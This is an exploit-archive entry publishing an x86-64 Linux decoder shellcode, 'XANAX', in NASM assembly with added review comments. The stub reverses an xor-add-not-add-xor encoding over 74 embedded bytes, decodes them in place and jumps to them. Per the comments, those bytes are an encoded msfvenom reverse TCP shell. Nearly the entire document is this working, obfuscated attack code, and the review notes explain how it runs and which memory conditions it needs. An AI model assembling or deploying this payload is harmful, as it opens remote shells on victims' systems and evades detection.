
Linux/x64 - XANAX Decoder Shellcode (127 bytes)

09 Apr 2019 00:00:00 — Reported by Alan Vivona — Type: zdt — Source: 0day.today — 26 Views

Linux/x64 XANAX Decoder Shellcode (127 bytes). Reverts the xor-add-not-add-xor sequence with 4 byte key for executing encoded payload

Linux/x64 - XANAX Decoder Shellcode (127 bytes)

; Date: 08/04/2019
; XANAX Decoder
; Author: Alan Vivona
; Description: Reverts the xor-add-not-add-xor sequence using the same 4 byte key and executes the encoded payload. 
; Tested on: x86-x64 GNU/Linux
;
; Review notes (reading of the stub as written):
;   - Syntax: NASM, Intel operand order, x86-64. The stub makes no calls and
;     touches only rax/rcx/rsi/flags, so there are no ABI or stack concerns;
;     it runs with whatever register state the host hands it.
;   - The stub is self-modifying: the encoded bytes at payload_start share the
;     section with the code, are rewritten in place by `mov byte [rsi+rcx], al`,
;     and are then jumped to. It therefore only runs from memory that is both
;     writable and executable; a normal ELF .text mapping is read-only and the
;     store would fault there. A missing W^X boundary (RWX mapping, executable
;     stack/heap) is the precondition a hardening check should look for.
;   - The four single-byte key constants, the xor/sub/not/sub/xor byte loop and
;     the trailing `jmp rsi` are the fixed, observable parts of this decoder;
;     the encoded bytes themselves depend on the key and the wrapped payload.
 
global _start
 
section .text
 
; Per-byte key material. The decode loop applies the inverse operations in
; reverse order: xor keys.xor2, sub keys.add2, not, sub keys.add1, xor keys.xor1.
; Note that `sub al, 0xff` on a byte is the same as `add al, 1` modulo 256.
keys.xor1 equ 0x29
keys.add1 equ 0xff
keys.xor2 equ 0x50
keys.add2 equ 0x05
 
; xanax encoded payload
; Length limit: `cmp rcx, payload.len` below assembles with a sign-extended 8-bit
; immediate only while the value fits in 0..127; a larger value forces a 32-bit
; immediate whose upper bytes are zero (the short `jmp encode_setup` over the
; data would presumably widen to rel32 the same way).
payload.len equ 74 ; this can't be over 127 bytes otherwise it will produce nullbytes
 
_start:
 
    ; Skip the data so it is never executed in encoded form; its address is
    ; taken later with a RIP-relative lea, so the stub is position independent.
    jmp encode_setup
    ; msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp -f hex
    ; Encoded using XANAX Encoder:
    ; 74 bytes, matching payload.len. Per the author's command line above the
    ; decoded bytes are an msfvenom linux/x64 reverse TCP shell.
    payload_start: db  0x92, 0x55, 0xc4, 0x05, 0x92, 0x8a, 0xdf, 0x92, 0x8d, 0xde, 0x8f, 0x89, 0xf4, 0x17, 0xf4, 0x25, 0x8a, 0x8c, 0x9d, 0xc0, 0xff, 0x8c, 0x8c, 0x8d, 0xdd, 0xf4, 0x35, 0x66, 0x92, 0x9c, 0xc2, 0x92, 0x52, 0xc4, 0x8f, 0x89, 0x92, 0x8b, 0xde, 0xf4, 0x7f, 0x4e, 0x92, 0xad, 0xc4, 0x8f, 0x89, 0xf9, 0x76, 0x92, 0xa3, 0xc4, 0x05, 0xf4, 0x23, 0xaf, 0xea, 0x95, 0xee, 0xaf, 0xfb, 0x94, 0x8c, 0xdb, 0xf4, 0x35, 0x67, 0xda, 0xd7, 0xf4, 0x35, 0x66, 0x8f, 0x89
 
    ; NOTE(review): the labels say "encode" but this loop undoes the encoding;
    ; read encode_setup/encode as decode_setup/decode.
    encode_setup:
    xor rcx, rcx                        ; rcx = byte index, runs 0..payload.len-1
    lea rsi, [rel payload_start]        ; rsi = &payload_start (RIP-relative)
    encode:
        mov al, byte [rsi+rcx]          ; al = encoded byte; only al is used, upper rax bits untouched
        ; Inverse of the XANAX sequence (xor, add, not, add, xor), applied in
        ; reverse order: undo xor2, undo add2, undo not, undo add1, undo xor1.
        xor al, keys.xor2
        sub al, keys.add2
        not al
        sub al, keys.add1
        xor al, keys.xor1
 
        mov byte [rsi+rcx], al          ; write the decoded byte back in place (self-modifying)
 
        inc rcx
        cmp rcx, payload.len            ; imm8 form; see the payload.len note above
        jne encode
 
    ; Execute payload: rsi still points at the first, now decoded, byte.
    jmp rsi
